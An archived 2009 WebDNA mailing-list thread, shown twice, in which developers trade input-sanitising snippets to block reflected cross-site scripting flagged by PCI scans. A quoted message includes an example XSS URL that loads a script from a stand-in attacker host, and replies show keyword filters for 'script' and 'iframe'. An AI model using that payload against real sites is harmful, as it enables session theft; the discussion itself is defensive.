Re: [WebDNA] PCI Vulnerability testing

This WebDNA talk-list message is from

2009


It keeps the original formatting.
numero = 102408
interpreted = N
texte = I'm guessing that is to take out the long cart number from the URL. You could redirect to [thisurl] if you wanted. Bill On Mon, Apr 13, 2009 at 4:34 PM, Jeffrey Jones wrote: > Hi Matthew, > Any specific reason you redirect to the index page? > -Jeff > On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosi wrote: > > This seems to work for me. > It seems to stand up to the attacks from McAfee Secure > > [formvariables] > [showif [url][name][/url]^script>][redirect /index.html][/showif] > [showif [url][name][/url]^iframe][redirect /index.html][/showif] > [text][url][name][/url]=3D[input][value][/input][/text] > [/formvariables] > [showif [countchars][cart][/countchars]>18][redirect /index.html][/showif= ] > > Matthew A Perosi JewelerWebsites.com > ------------------------------by Psi Prime------- > Senior Web Developer 323 Union Blvd. > Totowa, NJ 07512 > Pre-Sales: 888.872.0274 > Service: 973.413.8213 > Training: 973.413.8214 > Fax: 973.413.8217 > > http://www.jewelerwebsites.com > http://en.wikipedia.org/wiki/Psi_Prime%2C_Inc > http://www.psiprime.com > > Marc Thompson wrote: > > You are correct Willian NEVER trust user input. > What I always do is simply remove any characters I don't recognize using > grep. All user input is "cleaned" before taking any action on it > whatsoever. > > For [cart] values: > [GetChars start=3D1&end=3D20][Grep > search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] > > For other text values: > [GetChars start=3D1&end=3D100][Grep search=3D[^ > ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars] > > Marc > > William DeVaul wrote: > > > I have no idea about a server level fix. This goes to never trusting > user input. I thought it should always be surrounded by [raw] and > [url] to prevent this. > > What do others do? > > Bill > > On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > > > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart=3D"= " > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > > > > http://www.example.com/?var=3D"%20SRC=3D"http://www.attac= ker.com/xss.js"> > This will exploit the reflected cross site scripting vulnerability shown > before, executing the javascript code stored on the attacker's web server= as > if it was originating from the victim web site, www.example.com. > A complete test will include instantiating a variable with several attack > vectors (Check Fuzz vectors appendix and Encoded injection appendix). > Finally, analyzing answers can get complex. A simple way to do this is to > use code that pops up a dialog, as in our example. This typically indicat= es > that an attacker could execute arbitrary JavaScript of his choice in the > visitors' browsers. > > > --------------------------------------------------------- > This message is sent to you because you are subscribed to > the mailing list . > To unsubscribe, E-mail to: > archives: http://mail.webdna.us/list/talk@webdna.us > old archives: http://dev.webdna.us/TalkListArchive/ > . > > > > > Associated Messages, from the most recent to the oldest:

    
  1. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  2. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  3. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  4. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  5. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  6. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  7. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  8. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  9. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  10. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  11. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  12. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  13. Re: [WebDNA] PCI Vulnerability testing (Marc Thompson 2009)
  14. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  15. [WebDNA] PCI Vulnerability testing (Bob Minor 2009)
I'm guessing that is to take out the long cart number from the URL. You could redirect to [thisurl] if you wanted. Bill On Mon, Apr 13, 2009 at 4:34 PM, Jeffrey Jones wrote: > Hi Matthew, > Any specific reason you redirect to the index page? > -Jeff > On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosi wrote: > > This seems to work for me. > It seems to stand up to the attacks from McAfee Secure > > [formvariables] > [showif [url][name][/url]^script>][redirect /index.html][/showif] > [showif [url][name][/url]^iframe][redirect /index.html][/showif] > [text][url][name][/url]=3D[input][value][/input][/text] > [/formvariables] > [showif [countchars][cart][/countchars]>18][redirect /index.html][/showif= ] > > Matthew A Perosi JewelerWebsites.com > ------------------------------by Psi Prime------- > Senior Web Developer 323 Union Blvd. > Totowa, NJ 07512 > Pre-Sales: 888.872.0274 > Service: 973.413.8213 > Training: 973.413.8214 > Fax: 973.413.8217 > > http://www.jewelerwebsites.com > http://en.wikipedia.org/wiki/Psi_Prime%2C_Inc > http://www.psiprime.com > > Marc Thompson wrote: > > You are correct Willian NEVER trust user input. > What I always do is simply remove any characters I don't recognize using > grep. All user input is "cleaned" before taking any action on it > whatsoever. > > For [cart] values: > [GetChars start=3D1&end=3D20][Grep > search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] > > For other text values: > [GetChars start=3D1&end=3D100][Grep search=3D[^ > ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars] > > Marc > > William DeVaul wrote: > > > I have no idea about a server level fix. This goes to never trusting > user input. I thought it should always be surrounded by [raw] and > [url] to prevent this. > > What do others do? > > Bill > > On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote: > > > What are people doing for the following type of attacks? > > http://www.example.com/shoppingcart.tpl?cart=3D"= " > > I assume you could just do a [removehtml][cart][/removehtml] > > I know you can do something like that at the code level but is there > something that can be done at the server level or does the new version > cicadae have built in protections? > > More info on the attack > > > > http://www.example.com/?var=3D"%20SRC=3D"http://www.attac= ker.com/xss.js"> > This will exploit the reflected cross site scripting vulnerability shown > before, executing the javascript code stored on the attacker's web server= as > if it was originating from the victim web site, www.example.com. > A complete test will include instantiating a variable with several attack > vectors (Check Fuzz vectors appendix and Encoded injection appendix). > Finally, analyzing answers can get complex. A simple way to do this is to > use code that pops up a dialog, as in our example. This typically indicat= es > that an attacker could execute arbitrary JavaScript of his choice in the > visitors' browsers. > > > --------------------------------------------------------- > This message is sent to you because you are subscribed to > the mailing list . > To unsubscribe, E-mail to: > archives: http://mail.webdna.us/list/talk@webdna.us > old archives: http://dev.webdna.us/TalkListArchive/ > . > > > > > William DeVaul

DOWNLOAD WEBDNA NOW!

Top Articles:

Talk List

The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...

Related Readings:

WebCatalog 4.0 Users that want to talk to the Media.... (2000) Missing from Docs [folderName] (1997) RedHat dropping 7.x 8.x and 9.x - What linux for WebDNA? (2003) WebDNA vs PHP (2003) Re:[ShowIf] and empty fields (1997) Possible Bug in 2.0b15.acgi (1997) hiding blank fields (2003) [Listfiles] vs Netfinder (1997) RE: Cart Template (1997) search double negative comparison (2001) 4.5.1 upgrade? (2003) [WebDNA] FFmpeg - shell path - brew install (2017) Emailer help....! (1997) Errant Email. (1998) customizing the color of user's pages (1997) Search (1997) Help! WebCat2 bug (Ben's input) (1997) Cookie Newbie (2002) ANother SHOWIF problem (1997) Date Range search (1997)